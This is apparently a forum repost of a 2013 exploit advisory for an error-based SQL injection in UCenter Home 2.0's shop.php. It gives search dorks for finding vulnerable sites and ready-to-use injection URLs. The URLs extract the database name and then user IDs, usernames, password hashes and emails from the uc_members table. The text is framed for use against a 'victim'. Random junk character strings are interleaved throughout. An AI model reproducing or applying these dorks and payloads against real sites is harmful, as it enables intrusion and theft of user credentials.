找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2009|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:31:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
9 }6 D6 q) _6 f; n: R& p; b
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  1 p2 E! A0 y+ B) |' N

+ S8 e  X/ [. a, M4 X                                 
$ j6 @3 F! q0 Y5 W- I. E* U) w% y9 {0 C
*/ Author : KnocKout  
; K+ P# `2 h' m% C
% h+ D. u6 S" v& L* }5 S6 I% q( F*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  
4 v+ \9 s9 Q9 |  L! o  p/ K
6 y- A1 k7 m5 S! i& s7 S7 P*/ Contact: knockoutr@msn.com  
$ z3 e+ ~; P# h; ?
% _8 j0 H  ?9 R0 M0 e( P$ h*/ Cyber-Warrior.org/CWKnocKout  - I! \+ d3 i5 O9 y) C; q  s* L

+ I7 U( w- e6 d" N__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
, j4 q+ l4 Q; U, P& e
+ |" H. f8 u. j% o$ T5 f' VScript : UCenter Home  
0 a6 j8 x8 L7 V* x# g7 o) g  F0 k+ x+ T7 h3 a
Version : 2.0  9 V8 [) v" ^2 D* u2 @
$ ~: Q( G! {5 H1 t( y- S; J
Script HomePage : http://u.discuz.net/  2 ^$ g# I$ @. J& |
- k. @7 L! N  C, D7 Z
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
+ `8 ^: L9 C6 T3 @9 K6 I" [$ o6 R$ B
Dork : Powered by UCenter inurl:shop.php?ac=view  # y7 r# l  I% _/ d
! O7 k) l" k: h: U9 _7 R7 m) M
Dork 2 : inurl:shop.php?ac=view&shopid=  
9 r/ y. s9 S) a" z- M7 V$ y1 C2 d8 c6 e0 ?, O5 a- f& x
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
; t9 m- v% e4 U% w8 X' {6 M/ |/ c
2 w( f' ~! T" w. S( [Vuln file : Shop.php  
, p5 ^  b2 P. f6 X" ]) C/ s9 l$ w" V; K
value's : (?)ac=view&shopid=  4 z0 u1 Q* q/ U
2 \9 \. J- o- j' o$ N  W
Vulnerable Style : SQL Injection (MySQL Error Based)  
# F+ w! A# f/ N0 |( \5 D, N, p+ p9 {1 p$ V( w/ B7 O% H! z2 J
Need Metarials : Hex Conversion  5 W$ I/ w) A3 [$ |. H3 O) r! D! z
* d# U3 S" `- B( g0 N
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
8 C# H4 T% t/ _0 `! [  k. ^. G) `, Y; q' F: [& M
Your Need victim Database name.   ; T2 e" i, B$ M: p; m  d& c
& L. F; X* `9 e, M0 M5 t, X
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
$ C, h. Z, g9 |  }$ u# H! n% k: l6 a# D, `6 i
..  7 V& a5 {- `) {% x& t$ s. C
( I. `8 e$ ^! ?& n: h+ {
DB : Okey.  6 P: c& |8 E( b8 f- v1 ]
. Z, I; u  D7 |) c7 s* a
your edit DB `[TARGET DB NAME]`  8 y" y5 ]7 i( r0 I( W6 N$ Q# m5 ?
, X) F" _  W) [/ Y& w3 o
Example : 'hiwir1_ucenter'  
4 N1 Z- I  H5 V. R
, Q  D' s9 f+ [) @! i) ~! ~Edit : Okey.  4 h* g3 b! i3 q/ ~  k4 X
$ h! l' E3 u1 d9 n' j' h6 }% D8 I; y
Your use Hex conversion. And edit Your SQL Injection Exploit..  
) J6 [1 H' G9 v$ x# {# ^) b* j! p
9 @( j8 W" }7 V( d3 y8 c& y   ; x" J- Z: x4 V! V/ }
$ ?: T3 F5 G% U- ~& f0 F
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  9 w# O! Q2 l/ n8 r( U& O
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表